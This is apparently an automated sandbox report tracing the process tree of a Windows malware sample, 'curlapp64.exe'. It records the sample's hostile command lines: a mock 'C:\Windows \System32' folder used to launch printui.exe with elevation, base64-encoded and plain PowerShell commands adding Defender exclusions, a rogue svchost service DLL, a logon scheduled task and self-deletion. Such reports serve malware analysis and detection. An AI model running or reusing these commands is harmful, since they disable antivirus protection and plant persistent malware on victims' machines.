                                                                                                                              Start date:10/12/2024
                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:cmd.exe /c mkdir "\\?\C:\Windows \System32"
                                                                                                                              Imagebase:0x7ff659870000
                                                                                                                              File size:289'792 bytes
                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:16
                                                                                                                              Start time:01:35:39
                                                                                                                              Start date:10/12/2024
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                              File size:862'208 bytes
                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:18
                                                                                                                              Start time:01:35:39
                                                                                                                              Start date:10/12/2024
                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:cmd.exe /c timeout /t 10 /nobreak && del /q "C:\Users\user\Desktop\curlapp64.exe"
                                                                                                                              Imagebase:0x7ff659870000
                                                                                                                              File size:289'792 bytes
                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:19
                                                                                                                              Start time:01:35:39
                                                                                                                              Start date:10/12/2024
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                              File size:862'208 bytes
                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:20
                                                                                                                              Start time:01:35:39
                                                                                                                              Start date:10/12/2024
                                                                                                                              Path:C:\Windows\System32\timeout.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:timeout /t 10 /nobreak
                                                                                                                              Imagebase:0x7ff7bf9e0000
                                                                                                                              File size:32'768 bytes
                                                                                                                              MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:21
                                                                                                                              Start time:01:35:48
                                                                                                                              Start date:10/12/2024
                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:cmd.exe /c rmdir /s /q "C:\Windows \"
                                                                                                                              Imagebase:0x7ff659870000
                                                                                                                              File size:289'792 bytes
                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:22
                                                                                                                              Start time:01:35:48
                                                                                                                              Start date:10/12/2024
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                              File size:862'208 bytes
                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:23
                                                                                                                              Start time:01:35:48
                                                                                                                              Start date:10/12/2024
                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:cmd.exe /c mkdir "\\?\C:\Windows \System32"
                                                                                                                              Imagebase:0x7ff659870000
                                                                                                                              File size:289'792 bytes
                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:24
                                                                                                                              Start time:01:35:48
                                                                                                                              Start date:10/12/2024
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                              File size:862'208 bytes
                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:25
                                                                                                                              Start time:01:35:49
                                                                                                                              Start date:10/12/2024
                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:cmd.exe /c timeout /t 10 /nobreak && del /q "C:\Users\user\Desktop\curlapp64.exe"
                                                                                                                              Imagebase:0x7ff659870000
                                                                                                                              File size:289'792 bytes
                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:26
                                                                                                                              Start time:01:35:49
                                                                                                                              Start date:10/12/2024
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                              File size:862'208 bytes
                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:27
                                                                                                                              Start time:01:35:49
                                                                                                                              Start date:10/12/2024
                                                                                                                              Path:C:\Windows\System32\timeout.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:timeout /t 10 /nobreak
                                                                                                                              Imagebase:0x7ff7bf9e0000
                                                                                                                              File size:32'768 bytes
                                                                                                                              MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:29
                                                                                                                              Start time:01:35:56
                                                                                                                              Start date:10/12/2024
                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:cmd.exe /c rmdir /s /q "C:\Windows \"
                                                                                                                              Imagebase:0x7ff659870000
                                                                                                                              File size:289'792 bytes
                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:30
                                                                                                                              Start time:01:35:56
                                                                                                                              Start date:10/12/2024
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                              File size:862'208 bytes
                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:31
                                                                                                                              Start time:01:35:56
                                                                                                                              Start date:10/12/2024
                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:cmd.exe /c mkdir "\\?\C:\Windows \System32"
                                                                                                                              Imagebase:0x7ff659870000
                                                                                                                              File size:289'792 bytes
                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:32
                                                                                                                              Start time:01:35:56
                                                                                                                              Start date:10/12/2024
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                              File size:862'208 bytes
                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:33
                                                                                                                              Start time:01:35:56
                                                                                                                              Start date:10/12/2024
                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:cmd.exe /c start "" "C:\Windows \System32\printui.exe"
                                                                                                                              Imagebase:0x7ff659870000
                                                                                                                              File size:289'792 bytes
                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:34
                                                                                                                              Start time:01:35:56
                                                                                                                              Start date:10/12/2024
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                              File size:862'208 bytes
                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:35
                                                                                                                              Start time:01:35:56
                                                                                                                              Start date:10/12/2024
                                                                                                                              Path:C:\Windows \System32\printui.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:"C:\Windows \System32\printui.exe"
                                                                                                                              Imagebase:0x7ff7ecf40000
                                                                                                                              File size:64'000 bytes
                                                                                                                              MD5 hash:2FC3530F3E05667F8240FC77F7486E7E
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Antivirus matches:
                                                                                                                              • Detection: 0%, ReversingLabs
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:36
                                                                                                                              Start time:01:35:56
                                                                                                                              Start date:10/12/2024
                                                                                                                              Path:C:\Windows \System32\printui.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:"C:\Windows \System32\printui.exe"
                                                                                                                              Imagebase:0x7ff7ecf40000
                                                                                                                              File size:64'000 bytes
                                                                                                                              MD5 hash:2FC3530F3E05667F8240FC77F7486E7E
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:39
                                                                                                                              Start time:01:35:57
                                                                                                                              Start date:10/12/2024
                                                                                                                              Path:C:\Windows \System32\printui.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:"C:\Windows \System32\printui.exe"
                                                                                                                              Imagebase:0x7ff7ecf40000
                                                                                                                              File size:64'000 bytes
                                                                                                                              MD5 hash:2FC3530F3E05667F8240FC77F7486E7E
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:40
                                                                                                                              Start time:01:35:57
                                                                                                                              Start date:10/12/2024
                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:cmd.exe /c timeout /t 10 /nobreak && del /q "C:\Users\user\Desktop\curlapp64.exe"
                                                                                                                              Imagebase:0x7ff659870000
                                                                                                                              File size:289'792 bytes
                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:41
                                                                                                                              Start time:01:35:57
                                                                                                                              Start date:10/12/2024
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                              File size:862'208 bytes
                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:42
                                                                                                                              Start time:01:35:57
                                                                                                                              Start date:10/12/2024
                                                                                                                              Path:C:\Windows\System32\timeout.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:timeout /t 10 /nobreak
                                                                                                                              Imagebase:0x7ff7bf9e0000
                                                                                                                              File size:32'768 bytes
                                                                                                                              MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:43
                                                                                                                              Start time:01:36:17
                                                                                                                              Start date:10/12/2024
                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:cmd.exe /c powershell -Command "$dec = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiJGVudjpTeXN0ZW1Ecml2ZVxXaW5kb3dzIFxTeXN0ZW0zMiI7DQpBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICIkZW52OlN5c3RlbURyaXZlXFdpbmRvd3NcU3lzdGVtMzIiOw==')); Invoke-Expression $dec;"
                                                                                                                              Imagebase:0x7ff659870000
                                                                                                                              File size:289'792 bytes
                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:44
                                                                                                                              Start time:01:36:17
                                                                                                                              Start date:10/12/2024
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                              File size:862'208 bytes
                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:45
                                                                                                                              Start time:01:36:17
                                                                                                                              Start date:10/12/2024
                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:powershell -Command "$dec = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiJGVudjpTeXN0ZW1Ecml2ZVxXaW5kb3dzIFxTeXN0ZW0zMiI7DQpBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICIkZW52OlN5c3RlbURyaXZlXFdpbmRvd3NcU3lzdGVtMzIiOw==')); Invoke-Expression $dec;"
                                                                                                                              Imagebase:0x7ff7be880000
                                                                                                                              File size:452'608 bytes
                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:47
                                                                                                                              Start time:01:36:30
                                                                                                                              Start date:10/12/2024
                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';"
                                                                                                                              Imagebase:0x7ff659870000
                                                                                                                              File size:289'792 bytes
                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:48
                                                                                                                              Start time:01:36:30
                                                                                                                              Start date:10/12/2024
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                              File size:862'208 bytes
                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:49
                                                                                                                              Start time:01:36:30
                                                                                                                              Start date:10/12/2024
                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"
                                                                                                                              Imagebase:0x7ff7be880000
                                                                                                                              File size:452'608 bytes
                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:50
                                                                                                                              Start time:01:36:37
                                                                                                                              Start date:10/12/2024
                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:cmd.exe /c sc create x610437 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto && reg add HKLM\SYSTEM\CurrentControlSet\services\x610437\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x610437.dat" /f && sc start x610437
                                                                                                                              Imagebase:0x7ff659870000
                                                                                                                              File size:289'792 bytes
                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:51
                                                                                                                              Start time:01:36:37
                                                                                                                              Start date:10/12/2024
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                              File size:862'208 bytes
                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:52
                                                                                                                              Start time:01:36:37
                                                                                                                              Start date:10/12/2024
                                                                                                                              Path:C:\Windows\System32\sc.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:sc create x610437 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto
                                                                                                                              Imagebase:0x7ff7fbde0000
                                                                                                                              File size:72'192 bytes
                                                                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:53
                                                                                                                              Start time:01:36:37
                                                                                                                              Start date:10/12/2024
                                                                                                                              Path:C:\Windows\System32\reg.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:reg add HKLM\SYSTEM\CurrentControlSet\services\x610437\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x610437.dat" /f
                                                                                                                              Imagebase:0x7ff763a30000
                                                                                                                              File size:77'312 bytes
                                                                                                                              MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:54
                                                                                                                              Start time:01:36:37
                                                                                                                              Start date:10/12/2024
                                                                                                                              Path:C:\Windows\System32\sc.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:sc start x610437
                                                                                                                              Imagebase:0x7ff7fbde0000
                                                                                                                              File size:72'192 bytes
                                                                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:55
                                                                                                                              Start time:01:36:37
                                                                                                                              Start date:10/12/2024
                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k DcomLaunch
                                                                                                                              Imagebase:0x7ff7e52b0000
                                                                                                                              File size:55'320 bytes
                                                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:false

                                                                                                                              General

                                                                                                                              Target ID:56
                                                                                                                              Start time:01:36:37
                                                                                                                              Start date:10/12/2024
                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
                                                                                                                              Imagebase:0x7ff659870000
                                                                                                                              File size:289'792 bytes
                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:57
                                                                                                                              Start time:01:36:37
                                                                                                                              Start date:10/12/2024
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                              File size:862'208 bytes
                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:58
                                                                                                                              Start time:01:36:37
                                                                                                                              Start date:10/12/2024
                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
                                                                                                                              Imagebase:0x7ff7be880000
                                                                                                                              File size:452'608 bytes
                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:59
                                                                                                                              Start time:01:36:38
                                                                                                                              Start date:10/12/2024
                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:cmd.exe /c start "" "C:\Windows\System32\console_zero.exe"
                                                                                                                              Imagebase:0x7ff659870000
                                                                                                                              File size:289'792 bytes
                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:60
                                                                                                                              Start time:01:36:38
                                                                                                                              Start date:10/12/2024
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                              File size:862'208 bytes
                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:61
                                                                                                                              Start time:01:36:38
                                                                                                                              Start date:10/12/2024
                                                                                                                              Path:C:\Windows\System32\console_zero.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:"C:\Windows\System32\console_zero.exe"
                                                                                                                              Imagebase:0x7ff7f1c50000
                                                                                                                              File size:664'576 bytes
                                                                                                                              MD5 hash:A11604F5C925DDAADF2988AF05F4071B
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Antivirus matches:
                                                                                                                              • Detection: 46%, ReversingLabs
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:62
                                                                                                                              Start time:01:36:38
                                                                                                                              Start date:10/12/2024
                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
                                                                                                                              Imagebase:0x7ff659870000
                                                                                                                              File size:289'792 bytes
                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:63
                                                                                                                              Start time:01:36:38
                                                                                                                              Start date:10/12/2024
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                              File size:862'208 bytes
                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:64
                                                                                                                              Start time:01:36:38
                                                                                                                              Start date:10/12/2024
                                                                                                                              Path:C:\Windows\System32\schtasks.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
                                                                                                                              Imagebase:0x7ff643350000
                                                                                                                              File size:235'008 bytes
                                                                                                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:65
                                                                                                                              Start time:01:36:39
                                                                                                                              Start date:10/12/2024
                                                                                                                              Path:C:\Windows\System32\cmd.exe
